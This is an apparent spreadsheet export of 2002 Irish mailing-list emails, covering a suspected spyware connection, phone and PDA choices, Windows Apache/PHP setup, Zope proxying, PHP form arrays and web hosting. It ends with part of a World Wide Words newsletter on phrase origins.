&gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the stage
where
&gt; &gt;normal web-browsing is almost impossible.
&gt; &gt;I have checked IP address on RIPE database and I know precisely who is
being
&gt; &gt;called. I contacted that company on 14 July, when the problem first arose
&gt; &gt;and asked for a remedy but (surprise) got no reply.
&gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
&gt; &gt;ran this and haven't had a problem again until today.
&gt; &gt;The offending program is obviously not in Adaware db. (I run adaware with
&gt; &gt;current ref files every day now).?
&gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing this
&gt; &gt;from my pc?
&gt; &gt;Brian
&gt; &gt;
&gt; &gt;
&gt; &gt;_______________________________________________
&gt; &gt;IIU mailing list
&gt; &gt;IIU@iiu.taint.org
&gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
&gt;
&gt; ========================================================================
&gt; Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975
&gt;
&gt; " Our core product DÃ©iseditor Â©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DÃ©iseditor Â© " Managing Your Information "
&gt; ========================================================================
&gt;
&gt; _______________________________________________
&gt; IIU mailing list
&gt; IIU@iiu.taint.org
&gt; http://iiu.taint.org/mailman/listinfo/iiu
&gt;_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">It may be worth removing all your apps from the approved list. (a bit of a 
pain, I agree) then check the first app which makes the connection. With a 
bit of luck it won't be anything standardAt 21:47 03/08/02 +0100, you wrote:
&gt;Unfortunately, I don't. ZoneAlarm normally gives that info but not this
&gt;time. It just blocks the outward access and warns me that the attempt
&gt;occurred.
&gt;Brian
&gt;----- Original Message -----
&gt;From: "Martin Whelan" 
&gt;To: 
&gt;Sent: Saturday, August 03, 2002 9:32 PM
&gt;Subject: Re: [IIU] spyware calling home?
&gt;
&gt;
&gt; &gt; Do you know which app is making the connection?
&gt; &gt;
&gt; &gt;
&gt; &gt; At 20:18 03/08/02 +0100, you wrote:
&gt; &gt; &gt;Hello all
&gt; &gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
&gt;trying
&gt; &gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the stage
&gt;where
&gt; &gt; &gt;normal web-browsing is almost impossible.
&gt; &gt; &gt;I have checked IP address on RIPE database and I know precisely who is
&gt;being
&gt; &gt; &gt;called. I contacted that company on 14 July, when the problem first arose
&gt; &gt; &gt;and asked for a remedy but (surprise) got no reply.
&gt; &gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
&gt; &gt; &gt;ran this and haven't had a problem again until today.
&gt; &gt; &gt;The offending program is obviously not in Adaware db. (I run adaware with
&gt; &gt; &gt;current ref files every day now).?
&gt; &gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing this
&gt; &gt; &gt;from my pc?
&gt; &gt; &gt;Brian
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt;_______________________________________________
&gt; &gt; &gt;IIU mailing list
&gt; &gt; &gt;IIU@iiu.taint.org
&gt; &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
&gt; &gt;
&gt; &gt; ========================================================================
&gt; &gt; Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975
&gt; &gt;
&gt; &gt; " Our core product DÃ©iseditor Â© allows organisations to publish
&gt;information
&gt; &gt; to their web site in a fast and cost effective manner. There is no need
&gt;for
&gt; &gt; a full time web developer, as the site can be easily updated by the
&gt; &gt; organisations own staff.
&gt; &gt; Instant updates to keep site information fresh. Sites which are updated
&gt; &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html for
&gt;a
&gt; &gt; demonstration "
&gt; &gt;
&gt; &gt; DÃ©iseditor Â© " Managing Your Information "
&gt; &gt; ========================================================================
&gt; &gt;
&gt; &gt; _______________________________________________
&gt; &gt; IIU mailing list
&gt; &gt; IIU@iiu.taint.org
&gt; &gt; http://iiu.taint.org/mailman/listinfo/iiu
&gt; &gt;
&gt;
&gt;_______________________________________________
&gt;IIU mailing list
&gt;IIU@iiu.taint.org
&gt;http://iiu.taint.org/mailman/listinfo/iiu========================================================================
Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975" Our core product DÃ©iseditor Â©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"DÃ©iseditor Â© " Managing Your Information "
========================================================================_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Martin, iwill try that, however i've only approved the minimal
standard apps - I'll give it a go anyway. I think this is something more
insidious than the standard adprogram - maybe i'm paranoid!!!
Brian
----- Original Message -----
From: "Martin Whelan" 
To: 
Sent: Saturday, August 03, 2002 10:01 PM
Subject: Re: [IIU] spyware calling home?
&gt; It may be worth removing all your apps from the approved list. (a bit of a
&gt; pain, I agree) then check the first app which makes the connection. With a
&gt; bit of luck it won't be anything standard
&gt;
&gt; At 21:47 03/08/02 +0100, you wrote:
&gt; &gt;Unfortunately, I don't. ZoneAlarm normally gives that info but not this
&gt; &gt;time. It just blocks the outward access and warns me that the attempt
&gt; &gt;occurred.
&gt; &gt;Brian
&gt; &gt;----- Original Message -----
&gt; &gt;From: "Martin Whelan" 
&gt; &gt;To: 
&gt; &gt;Sent: Saturday, August 03, 2002 9:32 PM
&gt; &gt;Subject: Re: [IIU] spyware calling home?
&gt; &gt;
&gt; &gt;
&gt; &gt; &gt; Do you know which app is making the connection?
&gt; &gt; &gt;
&gt; &gt; &gt;
&gt; &gt; &gt; At 20:18 03/08/02 +0100, you wrote:
&gt; &gt; &gt; &gt;Hello all
&gt; &gt; &gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
&gt; &gt;trying
&gt; &gt; &gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the
stage
&gt; &gt;where
&gt; &gt; &gt; &gt;normal web-browsing is almost impossible.
&gt; &gt; &gt; &gt;I have checked IP address on RIPE database and I know precisely who
is
&gt; &gt;being
&gt; &gt; &gt; &gt;called. I contacted that company on 14 July, when the problem first
arose
&gt; &gt; &gt; &gt;and asked for a remedy but (surprise) got no reply.
&gt; &gt; &gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware
removal. I
&gt; &gt; &gt; &gt;ran this and haven't had a problem again until today.
&gt; &gt; &gt; &gt;The offending program is obviously not in Adaware db. (I run adaware
with
&gt; &gt; &gt; &gt;current ref files every day now).?
&gt; &gt; &gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing
this
&gt; &gt; &gt; &gt;from my pc?
&gt; &gt; &gt; &gt;Brian
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt;_______________________________________________
&gt; &gt; &gt; &gt;IIU mailing list
&gt; &gt; &gt; &gt;IIU@iiu.taint.org
&gt; &gt; &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
&gt; &gt; &gt;
&gt; &gt; &gt;
========================================================================
&gt; &gt; &gt; Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975
&gt; &gt; &gt;
&gt; &gt; &gt; " Our core product DÃ©iseditor Â© allows organisations to publish
&gt; &gt;information
&gt; &gt; &gt; to their web site in a fast and cost effective manner. There is no
need
&gt; &gt;for
&gt; &gt; &gt; a full time web developer, as the site can be easily updated by the
&gt; &gt; &gt; organisations own staff.
&gt; &gt; &gt; Instant updates to keep site information fresh. Sites which are
updated
&gt; &gt; &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html
for
&gt; &gt;a
&gt; &gt; &gt; demonstration "
&gt; &gt; &gt;
&gt; &gt; &gt; DÃ©iseditor Â© " Managing Your Information "
&gt; &gt; &gt;
========================================================================
&gt; &gt; &gt;
&gt; &gt; &gt; _______________________________________________
&gt; &gt; &gt; IIU mailing list
&gt; &gt; &gt; IIU@iiu.taint.org
&gt; &gt; &gt; http://iiu.taint.org/mailman/listinfo/iiu
&gt; &gt; &gt;
&gt; &gt;
&gt; &gt;_______________________________________________
&gt; &gt;IIU mailing list
&gt; &gt;IIU@iiu.taint.org
&gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
&gt;
&gt; ========================================================================
&gt; Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975
&gt;
&gt; " Our core product DÃ©iseditor Â©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DÃ©iseditor Â© " Managing Your Information "
&gt; ========================================================================
&gt;
&gt; _______________________________________________
&gt; IIU mailing list
&gt; IIU@iiu.taint.org
&gt; http://iiu.taint.org/mailman/listinfo/iiu
&gt;_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Ad Aware sometimes helps too.
-ROn Saturday, August 3, 2002, at 10:39  pm, Brian O'Brien wrote:&gt; Thanks, Martin, iwill try that, however i've only approved the minimal
&gt; standard apps - I'll give it a go anyway. I think this is something more
&gt; insidious than the standard adprogram - maybe i'm paranoid!!!
&gt; Brian_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">The IIU@iiu.taint.org mailing list has 3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From: abcqojps9@usa.net on Sat Aug  3 21:29:41 2002
    Cause: Post by non-member to a members-only list     From: zigzags@oceanfree.net on Fri Aug  9 16:09:55 2002
    Cause: Post by non-member to a members-only list
</t>
  </si>
  <si>
    <t>o2 xda?Darragh-----Original Message-----
From: iiu-admin@taint.org [mailto:iiu-admin@taint.org]On Behalf Of
Gearoid Griffin
Sent: 19 August 2002 14:18
To: iiu@taint.org
Subject: Re: [IIU] Recommendations on phone / pda+phone + European GPRS
coverage info.
Bernie, you might try the
Sony - Ericcison T68m? I use it with my Pocket Pc all the time no problems.
Gearï¿½id
----- Original Message -----
From: "Bernard Michael Tyers" 
To: ; "Open Tech list" 
Sent: Monday, August 19, 2002 2:12 PM
Subject: [IIU] Recommendations on phone / pda+phone + European GPRS coverage
info.
&gt; Hi everyone,
&gt; (apologies for the cross list posting)
&gt;
&gt; My boss has asked me about the whole phone-pda/pda + phone thingy.
&gt; They're looking for a phone with following outlined specs:
&gt;
&gt; 1. gprs
&gt; 2. tri-band (states useage also)
&gt; 3. long battery life
&gt; 4. irda/bluetooth (but bluetooth is only an add-on..I'm ignoring it)
&gt; 5. easy to use (phb market :)
&gt;
&gt; I had suggested him to maybe look at a pda/phone combo.
&gt;
&gt; Can anyone suggest :
&gt;
&gt; 1. possible phones with the first set of specs
&gt; 2. a phone/pda combo with the same specs
&gt; 3. some information sources (maps, rates, percentages, etc) for gprs
&gt; coverage europe-wide, and fees for roaming.
&gt;
&gt; thanks in advance,
&gt;
&gt; rgrds,
&gt; Bernard
&gt; --
&gt; Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
&gt; E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117
&gt;
&gt; _______________________________________________
&gt; IIU mailing list
&gt; IIU@iiu.taint.org
&gt; http://iiu.taint.org/mailman/listinfo/iiu
&gt;_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t>Hi,I believe you get more value for money by separating the mobile phone from 
the PDA.As expressed by power users on Open, a combination like a EUR 160 Nokia 
6310i talking to a EUR 440 Palm m515 will meet your specification. By using 
a EUR 90 Bluetooth SD chip, the Palm and the Nokia 6310i can talk to one 
another even when not in line of sight.regards
Berniewww.topgold.com/blog/
_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t>hi all,thanks for the good information on the choice of phones, pda choices.as an aside i also saw that 3com have released a usb blootooth dongle. 
that in a lptp combined with a 6310i with the blootooth (with HSCSD) 
might be a nice thing to have (if they work!)
i'm doin up a little doc, so if anyone is interested i'll post my findings.cheers!mit bestem,Bernardino
-- 
rgrds,
Bernard
-- 
Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t>howdy all,I have in my possession the following:2/3     Apple toner cartridges    M20 45G/A for laser writer 300 / 320 /
and 4/600 PS
1     Apple toner cartridge     M2473G/A  for laser writer 16/600PS /
pro 630 / pro 600
1     Cannon EP-A cartridge
1     Cannon EP-E cartridge(the numbers might be a little less)Does anyone have one of these printers? Does anyone want to give me the 
change in their pockets, or the price of a pint for them?
They would make a great Christmas present!If so you can call the printer cartridge hotline on the number below.
If lines are busy call later. But do call NOW!Bernard "I should be a host on QVC" Tyers-- 
Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, I know, dreadful subject. However, because of customer inistence we
must deploy one project on W2K. This will thus be a WAMP project rather than
a LAMP project. Of course as a highly skilled *ix person I can handle these
Windows toys :-) but can anyone suggest any good educational resources for
using Apache, PHP, Perl and MySQL together on W2K. Anyone had to do the same
and found any particular nasty gotchas (yes, I know about the running
Microsoft software one).Niall_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sunday 28 July 2002 23:49, Niall O Broin wrote:
&gt; Yes, I know, dreadful subject. However, because of customer inistence we
&gt; must deploy one project on W2K. This will thus be a WAMP project rather
&gt; than a LAMP project. Of course as a highly skilled *ix person I can handle
&gt; these Windows toys :-) but can anyone suggest any good educational
&gt; resources for using Apache, PHP, Perl and MySQL together on W2K. Anyone had
&gt; to do the same and found any particular nasty gotchas (yes, I know about
&gt; the running Microsoft software one).I had Apache, mod_php and MySQL running on windows 95 once :)As far as I remember, the only problem was getting the MSI installer installed
on win 95, but that was mentioned in the docs. w2k has that built in, so you
won't have that problem. You should be able to find pre-built binaries for 
win32.For perl try activestate.com, that's worked for me in the past.Nick
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi NickTry PHPTriad http://download.com.com/3000-2165-6474268.html?tag=lst-0-1"PHPTriad is a complete PHP development and server environment for Windows.
It installs PHP, Apache, MySQL, and PHPMyAdmin, both installing and setting
up the environment. Version 2.11 updates all components and it now includes
Perl 5."HTHWill_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">I thought I read somewhere that work on phpTriad had ceased?
Setting up MySQL/PHP/Perl (activestate)/Apache on win2k server is a
piece of cake anyhowNiallOn Wed, 2002-07-31 at 11:05, William Harrison - Protocol wrote:
&gt; Hi Nick
&gt; 
&gt; Try PHPTriad
&gt; 
&gt;  http://download.com.com/3000-2165-6474268.html?tag=lst-0-1
&gt; 
&gt; "PHPTriad is a complete PHP development and server environment for Windows.
&gt; It installs PHP, Apache, MySQL, and PHPMyAdmin, both installing and setting
&gt; up the environment. Version 2.11 updates all components and it now includes
&gt; Perl 5."
&gt; 
&gt; HTH
&gt; 
&gt; Will
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; _______________________________________________
&gt; Webdev mailing list
&gt; Webdev@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/webdev
&gt; _______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a reminder, sent out once a month, about your linux.ie mailing
list memberships.  It includes your subscription info and how to use
it to change it or unsubscribe from a list.You can visit the URLs to change your membership status or
configuration, including unsubscribing, setting digest-style delivery
or disabling delivery altogether (e.g., for a vacation), and so on.In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instructions.If you have questions, problems, comments, etc, send them to
listmaster@tuatha.org.  Thanks!Passwords for jm-webdev@jmason.org:List                                     Password // URL
----                                     --------  
webdev@linux.ie                          foo       
http://www.linux.ie/mailman/options/webdev/jm-webdev@jmason.org
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi all, I'm looking for a copy of the php-mailsettings package, or PHP Cyrus-Tools,
 which should include the former. All web references point to the canonical
 location, which is unavailable. Author hasn't responded either. Thanks!_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm trying to wrap Zope up behind apache, so I can do VirtualHosts for
Zope. I've a site on http://ip:8080/mysite. I want that to appear as http://mysite.com/ - so:
        ServerName mysite.com
        DocumentRoot /var/www/mysite
        RewriteEngine                   on
        RewriteRule     ^/(.*)    http://localhost:8080/mysite/$1 [P]
 Now, what happens is that apache grabs http://localhost:8080/mysite/ and spits
it out to the browser. Lovely. all works. Except for framed pages (like Zope's management interface). It ends up
looking like:     and of course, that's not what my client should go to. Any ideas what I'm
doing wrong ?Kate_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002 12:01:02 BST, Adrian Murphy said:
&gt;
&gt;I wonder could anyone reccommend a good
&gt;website monitoring service-with sms alerts.
&gt;thx and sorry to be OT.It sounds more like you're looking for a commercial service, in which
case "ain't got a bog", but on the offchance that you're looking for
software, try nagios. (www.nagios.org)It'll do that and a lot more.-- 
	Niall_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t xml:space="preserve">
You could try elive.http://monitoring.elive.ie/At 12:01 PM 19/08/2002 +0100, Adrian Murphy wrote:
&gt;Hi,
&gt;I wonder could anyone reccommend a good
&gt;website monitoring service-with sms alerts.
&gt;thx and sorry to be OT.
&gt;
&gt;Adrian Murphy
&gt;2020 Strategies
&gt;Beechlawn
&gt;Cloncrane
&gt;Clonbullogue
&gt;Co Offaly
&gt;IrelandLee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
--
SNITTERFIELD (n.)
Office noticeboard on which snitters (q.v.),cards saying 'You don't have to be
mad to work here, but if you are it helps !!!' and slightly smutty postcards
from ibiza get pinned up by snitterbies (q.v.)
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>At 06:10 PM 19/08/2002 +0100, Dave Wilson wrote:&gt;In order for PHP to parse the results of the SELECT MULTIPLE after it's 
&gt;submitted, the variable name needs to end with []. That's great; PHP will 
&gt;take each selected element and plant them as consecutive elements in an 
&gt;array. But that makes for quite messy code when trying to link the regions 
&gt;SELECT action with the sites SELECT MULTIPLE. Javascript can't refer to 
&gt;the SELECT MULTIPLE by name because of the brackets, so I have to refer to 
&gt;it by its location in the form.er, i understood you until you reached the above. Maybe its my lack of PHP 
but why would a variable name _need_ to end with [] ?With most languages you parse the submitted form data and should come out 
with either variables or an array / hash, which you then work with and name 
whatever you like.
Lee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
--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Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>&gt; er, i understood you until you reached the above. Maybe its my lack of 
&gt; PHP but why would a variable name _need_ to end with [] ?
&gt; 
&gt; With most languages you parse the submitted form data and should come 
&gt; out with either variables or an array / hash, which you then work with 
&gt; and name whatever you like.IIRC, if the query string containsvarname=FIRST&amp;varname=SECONDthen PHP will create a variable called "varname" with result SECOND. 
However, if the query string containsvarname[]=FIRST&amp;varname[]=SECONDthen PHP will create an array with varname[1]==FIRST and varname[2]==SECONDThere are other ways to get the data from the HTTP request, and I guess 
I'll do that if it turns out to simplify the script that creates the 
form; but as i understand it that's the "official" way to get data from 
a SELECT MULTIPLE using PHP.Dave
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>Kate asked about this several months ago, and I posted some code and hints on 
how to work around this problem. AFAIR, you simply refer to the form elements 
by their names, including brackets, but put " or ' around them, ie:val = "document.form.city[1]";I think that works, there's an answer to this question on http://faqts.com/ 
where I got the original answer.Donncha.On Monday 19 August 2002 18:28, Dave Wilson wrote:
&gt; &gt; er, i understood you until you reached the above. Maybe its my lack of
&gt; &gt; PHP but why would a variable name _need_ to end with [] ?
&gt; &gt;
&gt; &gt; With most languages you parse the submitted form data and should come
&gt; &gt; out with either variables or an array / hash, which you then work with
&gt; &gt; and name whatever you like.
&gt;
&gt; IIRC, if the query string contains
&gt;_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>On Mon, 2002-08-19 at 18:28, Dave Wilson wrote:
&gt; IIRC, if the query string contains
&gt; 
&gt; varname=FIRST&amp;varname=SECOND
&gt; 
&gt; then PHP will create a variable called "varname" with result SECOND. 
&gt; However, if the query string contains
&gt; 
&gt; varname[]=FIRST&amp;varname[]=SECOND
&gt; 
&gt; then PHP will create an array with varname[1]==FIRST and varname[2]==SECONDBy far the coolest solution to this would be to "fix" php :)
Take a look at main/php_variables.c in the php source distribution.
You could mess around with the variable is_array in
php_register_variable_ex() and see if you can force all variables to be
arrays :) As far as I can tell the reason they do this is to save
time by not having to work out which variables have multiple values.Nick
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>Hi,I am looking at the options for a UNIX/Linux Virtual Server capable of holding multiple domains - preferably not tooo expensive as I am not a business. I wish to build a few PHP/MySQL sites and host them...A rough list of features I am after areCirca 50MB-100MB web space for now
POP email accounts 
Account Control Panel 
Perl 
PHP 
MySQL 
FTP and Telnet Access 24/7
Own CGI-BIN
Webalizer Graphical Stats 
Server Side Includes 
Good Reachable Technical SupportI have seen a great looking 300MB solution in the region of 600Euro p.a. which at the moment is a bit over my financial head in one payment - I haven't completed any sites yet, but have a few potential jobs coming up.Any tips/pointers much appreciated!Regards,
Elvin _______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Hi all, Normally I would not post such things, but this is really cool for a
visual idea of how ppl are linking to you
http://www.touchgraph.com/TGGoogleBrowser.htmlIt may not work from the submit button, but one the java appelet is
loaded then try your URL. Its really quite nice.Aj- ----------------------------------------
AJ McKee
NMTB mediaPhone: (Europe) +353 1 473 53 72
       (North America) +1 206 339 4326Fax:   (Europe) +353 1 473 53 73
       (North America) +1 206 339 4326Website: http://www.nmtbmedia.com
- -----------------------------------------	-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use 
Comment: PGP/GPG Keys located at http://www.nmtbmedia.com/keys/iQA/AwUBPWQpnIHmA/TOOP95EQLE6gCcDlPEdah2rBmwTNUixPi4aung3g8AoJTK
llXGK8OOdlMSV/0o3YynpOEa
=Kxad
-----END PGP SIGNATURE-----
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>At 07:44 PM 21/08/2002 +0100, elvin@eircom.net wrote:&gt;Circa 50MB-100MB web space for now
&gt;POP email accounts
&gt;Account Control Panel
&gt;Perl
&gt;PHP
&gt;MySQL
&gt;FTP and Telnet Access 24/7You'll be lucky to get telnet anywhere, SSH should do though.&gt;Own CGI-BIN
&gt;Webalizer Graphical Stats
&gt;Server Side Includes
&gt;Good Reachable Technical Support
&gt;
&gt;I have seen a great looking 300MB solution in the region of 600Euro p.a. 
&gt;which at the moment is a bit over my financial head in one payment - I 
&gt;haven't completed any sites yet, but have a few potential jobs coming up.
&gt;
&gt;Any tips/pointers much appreciated!Try www.hosting365.ie - they haven't let me down yet.You could try iewebs.com aswell, though I don't know if they do "just hosting".
Lee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
--
PLEELEY (adj.)
Descriptive of a drunk person's attempt to be endearing.
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t>Hi Lee,+ You could try iewebs.com aswell, though I don't know if they do
+ "just hosting".
+
Heh, you won't find much on iewebs.com these days. Apache test page.For future reference, ieWebs is /kind of/ defunct -- I won't be able to do
private devel projects for a while, so I'm not actively pushing it. I still
do hosting and domreg, but I only do vanilla accounts unless I know the user
reasonably well. I have trust issues.Thanks for the plug though. Just like me to no longer have a website when it
happens. :)adam
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev</t>
  </si>
  <si>
    <t xml:space="preserve">WORLD WIDE WORDS           ISSUE 296          Saturday 20 July 2002
-------------------------------------------------------------------
Sent each Saturday to 15,000+ subscribers in at least 119 countries
Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
-------------------------------------------------------------------
 IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
   ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
Contents
-------------------------------------------------------------------
1. Turns of Phrase: Beanpole family.
2. Weird Words: Jobbernowl.
3. Beyond Words.
4. Q&amp;A: Chip off the old block; Bells and whistles; Mortarboard.
5. Endnote.
6. Subscription commands.
7. Contact addresses.
1. Turns of Phrase: Beanpole family
-------------------------------------------------------------------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 tall and thin,
with few people in each generation. The term "beanpole family" has
been around in the academic literature at least since 1987,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grandparents.The rising divorce rate partly explains the growth of the
'beanpole' family. With almost one in two marriages ending in
divorce, many adults have at least two families, each with a single
child.
                                             ["Observer", May 2002]Noting the rising number of so-called 'beanpole' families in
Britain (families with only one child), the report warns that a
child without siblings 'is starved of the companionship of family
members of their own age ... [leading to] greater social isolation,
with teenagers adopting a more selfish attitude to life'.
                                            ["Guardian", June 2002]
2. Weird Words: Jobbernowl
-------------------------------------------------------------------
A stupid person, a blockhead.Unfortunately, this useful and effective insult has rather dropped
out of use in these mealy-mouthed times. The last excursion for it
that I can find is in the classic W C Fields film "The Bank Dick"
of 1940, in which the word occurs in a variant form in the line:
"Surely, don't be a luddie-duddie, don't be a moon-calf, don't be a
jabbernow, you're not those, are you?". Before that, it turns up in
one of the novels of Hall Caine in 1890, but even by then it seems
to have been rather rare.It's from the old French "jobard", from "jobe", silly. That word
was then added to "noll", the top or crown of the head, the noddle.
The first sense was of a block-like or stupid-looking head, but was
soon extended to refer to the quality of the mind within.
"Jobbernowlism" is the condition or state of being a "jobbernowl",
or an act or remark that is especially stupid.Careful how you use it: the recipient might be a subscriber!
3. Beyond Words
-------------------------------------------------------------------
I've been away at a heritage conference in Colchester these past
few days. On my way back, my eye was caught by this warning sign
posted above some steps at the local railway station:   Caution
   Do not run on the stairs
   Use the hand rail
4. Q&amp;A
-------------------------------------------------------------------
Q. For my job I have to read American magazines concerning consumer
electronics, home systems, burglar alarms, etc. I very often come
across the expression "bells and whistles", which seem to relate to
equipment, accessories or features that are offered to the customer
as plusses but are not really indispensable for the device to work.
Is that right? And where does that funny phrase come from? [Herve
Castelain, France]Q. You're right about the meaning of this phrase, which refers to
gimmicks - non-essential but often engaging features added to a
piece of technical equipment or a computer program to make it seem
more superficially attractive without enhancing its main function.The phrase is actually quite modern and may be a product of the
American military. At least, one of its earliest appearances was in
an article in "Atlantic" in October 1982, which said it was
"Pentagon slang for extravagant frills". There's some evidence that
the term has actually been around since the 1960s, but the early
evidence is sparse.Where it comes from is still a matter of learned debate. A literal
sense of the phrase appeared around the middle of the nineteenth
century, referring to streetcars, railways and steamships. Before
modern electronics, there were really only two ways to make a loud
warning noise - you either rang a bell or tooted a whistle. Steam
made the latter a real power in the land (anybody who has heard the
noisy out-of-tune calliope on the steamboat Natchez at New Orleans
will agree about its power, though less so about its glory). And at
one time "clang, clang, clang went the trolley" in large numbers of
American cities.At least some early US railroad locomotives had both bells and
whistles, as this extract from an article in "Appleton's Journal"
of 1876 shows:  You look up at an angle of sixty degrees and see sweeping
  along the edge of a precipice, two-thirds up the rocky
  height, a train of red-and-yellow railway-cars, drawn by
  two wood-burning engines, the sound of whose bells and
  whistles seems like the small diversions of very little
  children, so diminished are they by the distance.Could it be that to have both bells and whistles was thought
excessive, a case of belt and braces, an unnecessary feature, a
frill?Possibly. But it's more probable the slang sense of the term comes
from that close musical relative of the calliope, the theatre
organ. Extraordinary instruments such as the Mighty Wurlitzer
augmented their basic repertoire by all sorts of sound effects to
help the organist accompany silent films, among them car horns,
sirens, and bird whistles. These effects were called toys, and
organs often had "toy counters" with 20 or more noisemakers on
them, including various bells and whistles. In the 1950s, decades
after the talkies came in, but while theatre organs were still
common in big movie houses, these fun features must have been
considered no longer essential to the function of the organ but
mere fripperies, inessential add-ons.It's possible the slang sense grew out of that. It got taken up
especially by the computing industry, perhaps because opportunities
to add them are so great.                        -----------Q. The designation of "robes" for academic dress clearly comes from
its origin with the clergy in the Middle Ages. But what about
"mortarboards"? The best I could find was its origin in the 12th or
13th century clergy cap, but that was not square-shaped. Does
"mortarboard" refer to the guilds or is its origin more ancient?A. The academic cap often called a "mortarboard" is quite ancient,
but that word for it only dates from the middle of the nineteenth
century (a less slangy way to identify it is to call it a
"square"). The literal mortar board is the wooden plate, usually
with a handle underneath, on which bricklayers carry small amounts
of mortar. A similar tool is used by plasterers, but they usually
